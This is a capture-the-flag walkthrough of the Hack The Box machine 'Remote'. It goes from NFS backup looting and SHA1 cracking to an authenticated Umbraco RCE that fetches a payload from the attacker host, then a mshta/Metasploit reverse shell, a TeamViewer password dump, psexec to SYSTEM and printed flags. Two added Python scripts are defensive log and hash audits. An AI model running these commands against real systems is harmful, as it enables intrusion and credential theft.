DaddyBigFish
Remote

Sun, 15 September 2024
Platform: Hack The Box

Nmap scan report for 10.129.230.172
Host is up (0.058s latency).
Not shown: 65519 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  nlockmgr      1-4 (RPC #100021)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 59m58s
| smb2-time: 
|   date: 2024-09-14T14:35:50
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
curl 10.129.230.172:80/people | grep '<h3 class="employee-grid__item__name">' | awk '{print $2 " " $3}'
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  6739  100  6739    0     0  50960      0 --:--:-- --:--:-- --:--:-- 51053
class="employee-grid__item__name">Jan Skovgaard</h3>
class="employee-grid__item__name">Matt Brailsford</h3>
class="employee-grid__item__name">Lee Kelleher</h3>
class="employee-grid__item__name">Jeavon Leopold</h3>
class="employee-grid__item__name">Jeroen Breuer</h3>


Jan Skovgaard
Matt Brailsford
Lee Kelleher
Jeavon Leopold
Jeroen Breuer
showmount -e remote.htb          
Export list for remote.htb:
/site_backups (everyone)
[Status: 302, Size: 126, Words: 6, Lines: 4, Duration: 56ms]
http://remote.htb/install
| --> | /umbraco/

[Status: 200, Size: 4040, Words: 710, Lines: 96, Duration: 380ms]
http://remote.htb/umbraco
searchsploit umbraco

------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                  |  Path
------------------------------------------------------------------------------------------------ ---------------------------------
Umbraco CMS - Remote Command Execution (Metasploit)                                             | windows/webapps/19671.rb
Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution                                      | aspx/webapps/46153.py
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated)                                      | aspx/webapps/49488.py
Umbraco CMS 8.9.1 - Directory Traversal                                                         | aspx/webapps/50241.py
Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scripting                                      | php/webapps/44988.txt
Umbraco v8.14.1 - 'baseUrl' SSRF                                                                | aspx/webapps/50462.txt
------------------------------------------------------------------------------------------------ ---------------------------------

sudo mount.nfs remote.htb:site_backups -w /mnt
cd /mnt
grep -rw "username" .                         
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:12:13,455 [P4408/D19/T40] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:15:24,558 [P4408/D20/T16] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:16:55,036 [P4408/D20/T41] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:21:36,660 [P4408/D20/T37] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Umbracoadmin123!! from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:21:42,642 [P4408/D20/T16] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:27:31,767 [P4408/D20/T45] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:27:38,043 [P4408/D20/T41] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:27:52,835 [P4408/D20/T45] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt: 2020-02-20 00:28:28,366 [P4408/D20/T6] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19: 2020-02-19 23:28:54,043 [P4408/D15/T45] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Admin from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19: 2020-02-19 23:32:45,046 [P4408/D18/T39] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Admin from IP address 192.168.195.1
./App_Data/Logs/UmbracoTraceLog.intranet.txt.2020-02-19: 2020-02-19 23:32:53,831 [P4408/D18/T6] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Admin from IP address 192.168.195.1
Login attempt succeeded for username admin@htb.local 
Login attempt succeeded for username ssmith@htb.local 
Login attempt failed for username Umbracoadmin123!!
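Added detection example, not part of the original writeup: a parser for the BackOfficeSignInManager trace lines above that counts failures per source IP, lists the usernames tried from each IP, and flags "usernames" that look like a password typed into the wrong field (Umbracoadmin123!! above), since such entries leak a credential into a log that a world-readable backup then hands out. The sample input reuses four lines from the excerpt plus one constructed line from a second IP and one unrelated INFO line.

```python
import re
from collections import Counter, defaultdict

# Umbraco 7 BackOfficeSignInManager trace line (UmbracoTraceLog.*.txt). search()
# rather than match() so the "./path: " prefix that grep -r adds does no harm.
LOGIN_RE = re.compile(
    r"(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}).*?"
    r"Login attempt (?P<result>succeeded|failed) for username (?P<user>.+?) "
    r"from IP address (?P<ip>\S+)"
)
# Real logins here are emails or short words; a "username" mixing digits with
# punctuation outside [@.-_] is most likely a password typed into the wrong box.
PASSWORD_LIKE_RE = re.compile(r"^(?=.*\d)(?=.*[^\w@.\-]).+$")

def parse_login_events(lines):
    """One dict (ts, result, user, ip) per recognised login line."""
    return [m.groupdict() for m in map(LOGIN_RE.search, lines) if m]

def triage(lines, fail_threshold=3):
    """Failures per source IP, usernames tried, and leaked-looking usernames."""
    events = parse_login_events(lines)
    fails_by_ip = Counter(e["ip"] for e in events if e["result"] == "failed")
    users_by_ip = defaultdict(set)
    for e in events:
        users_by_ip[e["ip"]].add(e["user"])
    return {
        "events": len(events),
        "failed_by_ip": dict(fails_by_ip),
        "bruteforce_ips": sorted(ip for ip, n in fails_by_ip.items() if n >= fail_threshold),
        "usernames_by_ip": {ip: sorted(u) for ip, u in users_by_ip.items()},
        "password_like_usernames": sorted(
            {e["user"] for e in events if PASSWORD_LIKE_RE.match(e["user"])}),
        "successes": [(e["user"], e["ip"]) for e in events if e["result"] == "succeeded"],
    }

# Sample input: four lines copied from the excerpt above, one constructed line
# from a second source IP, and one unrelated INFO line that must be ignored.
SAMPLE_LOG = """\
2020-02-20 00:12:13,455 [P4408/D19/T40] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt succeeded for username admin@htb.local from IP address 192.168.195.1
2020-02-20 00:21:36,660 [P4408/D20/T37] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Umbracoadmin123!! from IP address 192.168.195.1
2020-02-20 00:27:31,767 [P4408/D20/T45] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith@htb.local from IP address 192.168.195.1
2020-02-20 00:28:28,366 [P4408/D20/T6] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username ssmith from IP address 192.168.195.1
2020-02-20 00:30:00,000 [P4408/D20/T6] INFO  Umbraco.Core.Security.BackOfficeSignInManager - Event Id: 0, state: Login attempt failed for username Admin from IP address 10.0.0.7
2020-02-20 00:31:00,000 [P4408/D20/T6] INFO  Umbraco.Core.PublishedContentCache - Loaded 12 items
""".splitlines()

if __name__ == "__main__":
    for key, value in triage(SAMPLE_LOG).items():
        print(f"{key}: {value}")
```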
find . -type f -exec strings {} + | grep "admin"
Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50
adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-US82756c26-4321-4d27-b429-1b5c7c4f882f
find . -type f -exec strings {} + | grep "ssmith"
ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749
ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32
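Added audit example, not the writeup's own code: parse the flattened umbracoUser rows that `strings` produced above and report which accounts still sit on the legacy unsalted SHA1 storage (admin) instead of the salted HMACSHA256 form seen for ssmith, which is the list a defender would reset and rehash. The row layout and the base64 salt-then-HMAC split are inferred from the records shown.

```python
import re

# `strings` on Umbraco.sdf flattens each umbracoUser row to
# [name]login+email+password+{"hashAlgorithm":...}+email+locale+GUID, which is
# exactly the shape of the grep output above. Two password shapes occur there.
SHA1_HEX = r"[0-9a-f]{40}"                            # legacy unsalted SHA1 hex
SALT_HMAC = r"[A-Za-z0-9+/]{22}==[A-Za-z0-9+/]{43}="   # base64 16-byte salt + 32-byte HMAC
ROW_RE = re.compile(
    r"(?P<prefix>.*?)(?P<pw>" + SHA1_HEX + "|" + SALT_HMAC + r")"
    r'\{"hashAlgorithm":"(?P<alg>[^"]+)"\}(?P<email>[^\s{}]*?@[^\s{}]*?)?en-US'
)

def parse_user_row(row):
    """Split one flattened row into login, email, algorithm and storage kind."""
    m = ROW_RE.search(row)
    if not m:
        return None
    prefix, email = m["prefix"], m["email"] or ""
    # The login is whatever precedes the first copy of the email address; rows
    # without that copy keep the whole prefix (it may include the display name).
    login = prefix[: -len(email)] if email and prefix.endswith(email) else prefix
    storage = "unsalted-sha1" if re.fullmatch(SHA1_HEX, m["pw"]) else "salted-hmacsha256"
    return {"login": login, "email": email, "algorithm": m["alg"], "storage": storage}

def weak_hash_accounts(rows):
    """Logins whose stored password is not a salted HMACSHA256: reset and rehash."""
    parsed = [p for p in map(parse_user_row, rows) if p]
    return sorted({p["login"] for p in parsed
                   if p["storage"] != "salted-hmacsha256" or p["algorithm"] != "HMACSHA256"})

# Rows copied from the strings output above plus one unrelated string.
SAMPLE_ROWS = [
    'adminadmin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}admin@htb.localen-USfeb1a998-d3bf-406a-b30b-e269d7abdf50',
    'ssmithsmith@htb.localjxDUCcruzN8rSRlqnfmvqw==AIKYyl6Fyy29KA3htB/ERiyJUAdpTtFeTpnIk9CiHts={"hashAlgorithm":"HMACSHA256"}smith@htb.localen-US7e39df83-5e64-4b93-9702-ae257a9b9749',
    'ssmithssmith@htb.local8+xXICbPe7m5NQ22HfcGlg==RF9OLinww9rd2PmaKUpLteR6vesD2MtFaBKe1zL5SXA={"hashAlgorithm":"HMACSHA256"}ssmith@htb.localen-US3628acfb-a62c-4ab0-93f7-5ee9724c8d32',
    "umbracoUser",
]

if __name__ == "__main__":
    for row in SAMPLE_ROWS:
        print(parse_user_row(row))
    print("needs rehash:", weak_hash_accounts(SAMPLE_ROWS))
```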
echo 'b8be16afba8c314ad33d812f22a04991b90e2aaa' | johnx rockyou

Hash: b8be16afba8c314ad33d812f22a04991b90e2aaa
Wordlist: rockyou
Format: raw-sha1
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA1 [SHA1 512/512 AVX512BW 16x])
Warning: no OpenMP support for this hash type, consider --fork=4
Press 'q' or Ctrl-C to abort, almost any other key for status
baconandcheese   (?)     
1g 0:00:00:00 DONE (2024-09-15 00:06) 2.631g/s 25849Kp/s 25849Kc/s 25849KC/s baconbarnett..baconand21
Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
Session completed.
http://remote.htb/umbraco

login:
admin@htb.local:baconandcheese
Umbraco version 7.12.4

python3 Exploits/umbarco-7.12.4.py -u admin@htb.local -p baconandcheese -i http://remote.htb -c curl -a "10.10.16.4:8088/shell.bat -o C:/programdata/shell.bat"
python3 Exploits/umbarco-7.12.4.py -u admin@htb.local -p baconandcheese -i http://remote.htb -c "C:/programdata/shell.bat"
cd C:\Users\Public\Desktop
type user.txt
e4df2964f254745b546da66ccd7d6381
 Directory of C:\Users\Public\Desktop

01/09/2024  10:48 AM    <DIR>          .
01/09/2024  10:48 AM    <DIR>          ..
09/14/2024  09:23 PM               971 TeamViewer 7.lnk
09/14/2024  07:03 PM                34 user.txt
               2 File(s)          1,005 bytes
               2 Dir(s)  13,339,992,064 bytes free
msf6 exploit(multi/handler) > windows/misc/hta_server
msf6 exploit(windows/misc/hta_server) > set srvhost 10.10.16.4
srvhost => 10.10.16.4
msf6 exploit(windows/misc/hta_server) > set lhost 10.10.16.4
lhost => 10.10.16.4
msf6 exploit(windows/misc/hta_server) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/misc/hta_server) > 
[*] Started reverse TCP handler on 10.10.16.4:4444 
[*] Using URL: http://10.10.16.4:8080/jE54f2zCU.hta
[*] Server started.
python3 Exploits/umbarco-7.12.4.py -u admin@htb.local -p baconandcheese -i http://remote.htb -c mshta.exe -a "http://10.10.16.4:8080/jE54f2zCU.hta"

[*] Sending stage (176198 bytes) to 10.10.10.180
[*] Meterpreter session 1 opened (10.10.16.4:4444 -> 10.10.10.180:49729) at 2024-09-15 04:18:31 +0100
[*] 10.10.16.4       hta_server - Delivering Payload
msf6 exploit(windows/misc/hta_server) > sessions

Active sessions
===============

  Id  Name  Type                     Information                          Connection
  --  ----  ----                     -----------                          ----------
  1         meterpreter x86/windows  IIS APPPOOL\DefaultAppPool @ REMOTE  10.10.16.4:4444 -> 10.10.10.180:49729 (10.10.10.180)

msf6 exploit(windows/misc/hta_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > run post/windows/gather/credentials/teamviewer_passwords

[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
impacket-psexec Administrator@remote.htb cmd.exe      
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Requesting shares on remote.htb.....
[*] Found writable share ADMIN$
[*] Uploading file aDJBVBDA.exe
[*] Opening SVCManager on remote.htb.....
[*] Creating service EjrD on remote.htb.....
[*] Starting service EjrD.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
cd C:\Users\Administrator\Desktop

type root.txt
031af16b2bc6d902d89dcb0602c65ee6